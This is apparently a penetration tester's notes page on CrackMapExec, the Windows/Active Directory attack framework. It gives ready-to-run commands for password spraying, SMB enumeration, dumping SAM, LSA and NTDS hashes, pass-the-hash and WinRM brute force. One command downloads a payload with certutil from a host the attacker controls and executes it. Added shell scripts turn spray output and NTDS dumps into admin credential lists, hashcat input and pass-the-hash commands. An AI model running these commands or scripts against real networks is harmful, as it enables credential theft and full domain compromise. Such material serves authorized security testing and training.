1.crackmapexec

Main Purpose

CrackMapExec (CME) is a post-exploitation and enumeration framework for Windows and Active Directory networks. Besides its own protocol support (SMB, LDAP, MSSQL, SSH, WinRM) it wraps external tools such as Mimikatz and Metasploit shells as modules.

Top Utility
  • SMB ---> Own stuff using SMB
  • LDAP ---> Own stuff using LDAP
  • MSSQL ---> Own stuff using MSSQL
  • SSH ---> Own stuff using SSH
  • WINRM ---> Own stuff using WinRM
  • Many more utilities...

General Commands

Commands

# Module
crackmapexec smb -L                                   ---> List all the available modules
crackmapexec smb -m MODULE --options                  ---> Print the options for the module
crackmapexec smb IP -u 'USER' -p 'PASS' -m MODULE     ---> Use the module (add -o OPTION=VALUE for module options)
# Options
-t THREADS            set how many concurrent threads to use (default: 100)
--timeout TIMEOUT     max timeout in seconds of each thread (default: None)
--jitter INTERVAL     sets a random delay between each connection (default: None)
--darrell             give Darrell a hand
--verbose             enable verbose output

SMB

Command (Connection)

crackmapexec smb IP -u '' -p ''
  • -u ---> Username
  • -p ---> Password

Always try a NULL session (-u '' -p '') and the guest account (-u 'guest' -p '') first when connecting to a target over SMB; either one is often enough to enumerate shares, users or the password policy without a real credential.

Command (Brute Force)

crackmapexec smb IP -u USERNAMES.txt -p PASSWORDS.txt --continue-on-success
  • -u ---> Usernames (file)
  • -p ---> Passwords (file)
  • --continue-on-success ---> Keep going after the first valid credential instead of stopping
  • --no-bruteforce ---> Pair line N of the user file with line N of the password file instead of trying every combination

Accounts with administrative access on the target are flagged with (Pwn3d!); on a domain controller that is domain admin level access. Check the lockout threshold with --pass-pol first: -u file -p file tries every user/password combination and can lock out the whole domain, so spray one password across all users per round, stay under the threshold, and stop as soon as STATUS_ACCOUNT_LOCKED_OUT shows up in the output.
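To make a spray run's output usable, here is an added shell example (written for these notes, not part of CrackMapExec) that filters CME output for valid logins, (Pwn3d!) hits and lockouts, and refuses to continue the spray once a lockout appears. The sample lines, hosts, users and passwords are constructed to mimic CME's "PROTO host port hostname [+|-] domain\user:pass [status]" layout, not captured from a real host; the function names are mine.

```shell
#!/usr/bin/env bash
# Added example (not part of the original notes or of CrackMapExec itself):
# filter crackmapexec smb spray output for valid credentials, (Pwn3d!) hits
# and lockouts. The lines below are constructed to mimic CME's output layout.
CME_SAMPLE='SMB         10.10.10.5      445    DC01             [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:corp.local) (signing:True) (SMBv1:False)
SMB         10.10.10.5      445    DC01             [-] corp.local\asmith:Spring2024! STATUS_LOGON_FAILURE
SMB         10.10.10.5      445    DC01             [+] corp.local\jdoe:Spring2024!
SMB         10.10.10.5      445    DC01             [-] corp.local\locked:Spring2024! STATUS_ACCOUNT_LOCKED_OUT
SMB         10.10.10.5      445    DC01             [+] corp.local\svc_backup:Spring2024! (Pwn3d!)'

# All valid logins from CME output on stdin, one per line:
#   host,domain\user:password,admin   (admin is "yes" when CME appended (Pwn3d!))
cme_valid_creds() {
  awk '$5 == "[+]" && $6 ~ /:/ {
         admin = ($0 ~ /\(Pwn3d!\)/) ? "yes" : "no"
         print $2 "," $6 "," admin
       }'
}

# Only the credentials that are admin on the target: host,domain\user:password
cme_admin_creds() {
  cme_valid_creds | awk -F, '$3 == "yes" { print $1 "," $2 }'
}

# Accounts the spray has locked out (domain\user). A non-empty result means
# the spray must stop until the lockout observation window has passed.
cme_locked_accounts() {
  awk '$5 == "[-]" && /STATUS_ACCOUNT_LOCKED_OUT/ {
         split($6, cred, ":"); print cred[1]
       }'
}

# Exit status 0 when it is safe to run the next spray round, 1 when a lockout was seen.
cme_spray_safe() {
  [ -z "$(cme_locked_accounts)" ]
}

# Demo on the constructed sample (a real run: crackmapexec smb ... | tee cme.log)
printf '%s\n' "$CME_SAMPLE" | cme_valid_creds
printf '%s\n' "$CME_SAMPLE" | cme_spray_safe || echo "lockout observed, stop spraying"
```

Feed a real run with `crackmapexec smb ... | tee cme.log` and then `cme_valid_creds < cme.log`. The field split cuts a password at its first space, so quote or post-process if the wordlist contains passwords with spaces.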

Command (Shares Enumeration)

# A NULL or guest session is sometimes enough; otherwise use a valid account
crackmapexec smb IP -u '' -p '' --shares
  • -u ---> Username
  • -p ---> Password
  • --shares ---> Enumerate shares and the access the account has on each (READ / WRITE)

Command (User Enumeration)

# Take note you need a valid account to perform the following
crackmapexec smb IP -u 'Valid-User' -p 'Valid-Pass' --users
  • -u ---> Username
  • -p ---> Password
  • --users ---> List domain users

Command (Groups Enumeration)

# Take note you need a valid account to perform the following
crackmapexec smb IP -u 'Valid-User' -p 'Valid-Pass' --groups
  • -u ---> Username
  • -p ---> Password
  • --groups ---> List domain groups

Command (Password Policy (length))

# A NULL session is often enough for this; otherwise use a valid account
crackmapexec smb IP -u '' -p '' --pass-pol
  • -u ---> Username
  • -p ---> Password
  • --pass-pol ---> Dump the domain password policy: minimum length, complexity, history and, most importantly, the lockout threshold and window (check this before any brute force)

Command (Check Current log-on sessions)

# Take note you need a valid account to perform the following
crackmapexec smb IP -u 'Valid-User' -p 'Valid-Pass' --sessions
  • -u ---> Username
  • -p ---> Password
  • --sessions ---> List the sessions currently open on the target (who is logged on from where)

Command (Dump Hash | sam, lsa, ntds)

# Take note you need a valid account with administrative access on the target (a domain controller for --ntds)
crackmapexec smb IP -u 'Valid-User' -p 'Valid-Pass' --ntds
  • -u ---> Username
  • -p ---> Password
  • --ntds ---> Dump NTDS.dit from a domain controller (use --sam for the local SAM hashes or --lsa for the LSA secrets instead; each is its own flag)

Difference between those elements

SAM ---> The Security Account Manager database stores the local user accounts of a Windows host: usernames, SIDs and the LM/NT password hashes. It is a registry hive stored in %SYSTEMROOT%\system32\config and is what --sam dumps; the hashes only matter on that host (or on other hosts reusing the same local password).

LSA ---> The Local Security Authority is the component of Windows that authenticates users, grants access to resources and enforces security policy. It is not a standalone file. --lsa dumps the LSA secrets from the SECURITY hive: cached domain logons (DCC2 hashes), service account and scheduled task passwords, and the machine account password.

NTDS ---> NTDS.dit is the Active Directory database on a domain controller and holds every object in the domain (users, groups, computers) together with every account's password hash. It is stored under %SYSTEMROOT%\NTDS; dumping it with --ntds needs administrative access on a DC and yields every domain credential, including krbtgt.

Command (Run Custom Command (Example MSFvenom payload))

# Take note you need a valid account with administrative access on the target
crackmapexec smb IP -u 'Valid-User' -p 'Valid-Pass' -x 'certutil -urlcache -f http://IP:PORT/PAYLOAD_NAME.exe payload_name.exe && cmd /c payload_name.exe'
  • -u ---> Username
  • -p ---> Password
  • -x ---> Command to run on the machine through cmd.exe (use -X for a PowerShell command)
    • certutil -urlcache -f ---> Download the payload from the host we control
    • IP:PORT ---> Address and port where we are hosting the payload
    • cmd /c ---> Run the downloaded program

Pass the Hash

crackmapexec smb IP -u USERNAME -H 32196B56FFE6F45E294117B91A83BF38 -x COMMAND
  • -H ---> NT hash of the account (LM:NT is also accepted); no plaintext password needed
  • Add -d DOMAIN for a domain account, or --local-auth for a local account on the target

---> More information: [[3 - Authentication Relays (Responder)]]
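The hash dump and pass-the-hash sections above fit together: the NT hashes from --ntds go straight into -H. Here is an added shell example (written for these notes, not CrackMapExec's own code) that turns --ntds output into a hashcat file, flags accounts whose NT hash is the empty-password hash, and builds the pass-the-hash command for one account. The sample lines are constructed to mimic CME's secretsdump-style "user:rid:lmhash:nthash:::" records; apart from the well-known empty-password NT hash and the hash used in the pass-the-hash command above, the hash values are placeholders, and the hosts, users and function names are mine.

```shell
#!/usr/bin/env bash
# Added example (not part of the original notes or of CrackMapExec itself):
# post-process "crackmapexec smb DC -u ADMIN -p PASS --ntds" output. The sample
# below is constructed; hashes are placeholders except the empty-password hash.
NTDS_SAMPLE='SMB         10.10.10.5      445    DC01             [+] corp.local\Administrator:Winter2024! (Pwn3d!)
SMB         10.10.10.5      445    DC01             [+] Dumping the NTDS, this could take a while...
SMB         10.10.10.5      445    DC01             Administrator:500:aad3b435b51404eeaad3b435b51404ee:32196b56ffe6f45e294117b91a83bf38:::
SMB         10.10.10.5      445    DC01             Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         10.10.10.5      445    DC01             krbtgt:502:aad3b435b51404eeaad3b435b51404ee:1f7c3a0e9b6d5c4a2b8e7f6d5c4b3a29:::
SMB         10.10.10.5      445    DC01             corp.local\jdoe:1104:aad3b435b51404eeaad3b435b51404ee:9a8b7c6d5e4f30211f0e9d8c7b6a5f4e:::
SMB         10.10.10.5      445    DC01             DC01$:1000:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::'

EMPTY_NT='31d6cfe0d16ae931b73c59d7e0c089c0'   # NT hash of the empty password

# Keep only the dump records from CME output on stdin: user:rid:lm:nt:::
ntds_records() {
  awk '$5 ~ /^[^:]+:[0-9]+:[0-9a-fA-F]+:[0-9a-fA-F]+:::$/ { print $5 }'
}

# user:nthash lines for "hashcat -m 1000 --username"; machine accounts ($)
# are dropped because their passwords are random and not worth cracking.
ntds_to_hashcat() {
  ntds_records | awk -F: '$1 !~ /\$$/ { print $1 ":" $4 }'
}

# Accounts whose NT hash is the empty-password hash (usually disabled accounts
# such as Guest, but an enabled one is a free login).
ntds_empty_password() {
  ntds_records | awk -F: -v empty="$EMPTY_NT" 'tolower($4) == empty { print $1 }'
}

# Build the pass-the-hash command for one user from the dump on stdin.
# Arguments: target, domain, user. Prints the command instead of running it;
# returns 1 when the user is not in the dump.
ntds_pth_cmd() {
  target=$1; domain=$2; user=$3
  nt=$(ntds_records | awk -F: -v u="$user" '{ name = $1; sub(/^.*\\/, "", name) } name == u { print $4; exit }')
  [ -n "$nt" ] || return 1
  printf 'crackmapexec smb %s -d %s -u %s -H %s\n' "$target" "$domain" "$user" "$nt"
}

# Demo on the constructed sample (a real run: crackmapexec smb DC ... --ntds | tee ntds.log)
printf '%s\n' "$NTDS_SAMPLE" | ntds_to_hashcat
printf '%s\n' "$NTDS_SAMPLE" | ntds_empty_password
printf '%s\n' "$NTDS_SAMPLE" | ntds_pth_cmd 10.10.10.20 corp.local jdoe
```

With a real dump, `ntds_to_hashcat < ntds.log > domain.hashes` gives the input for `hashcat -m 1000 --username domain.hashes wordlist`, and the hashes that do not crack are still usable as-is through -H.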

Winrm

Command

# Brute Force
crackmapexec winrm IP -u 'administrator' -p WORDLIST.txt

# Sign In testing and Commands
crackmapexec winrm IP -u 'USER' -p 'PASS' -x "ipconfig"
  • Possible to brute force it or simply check if a credential is valid
  • Possible to send a command with a valid credential (the user must be allowed to log on through WinRM, e.g. a local admin or a member of Remote Management Users)

Check [[• Evil Winrm]] for the rest of the exploitation (interactive shell over WinRM)

More Information

More information ---> https://wiki.porchetta.industries/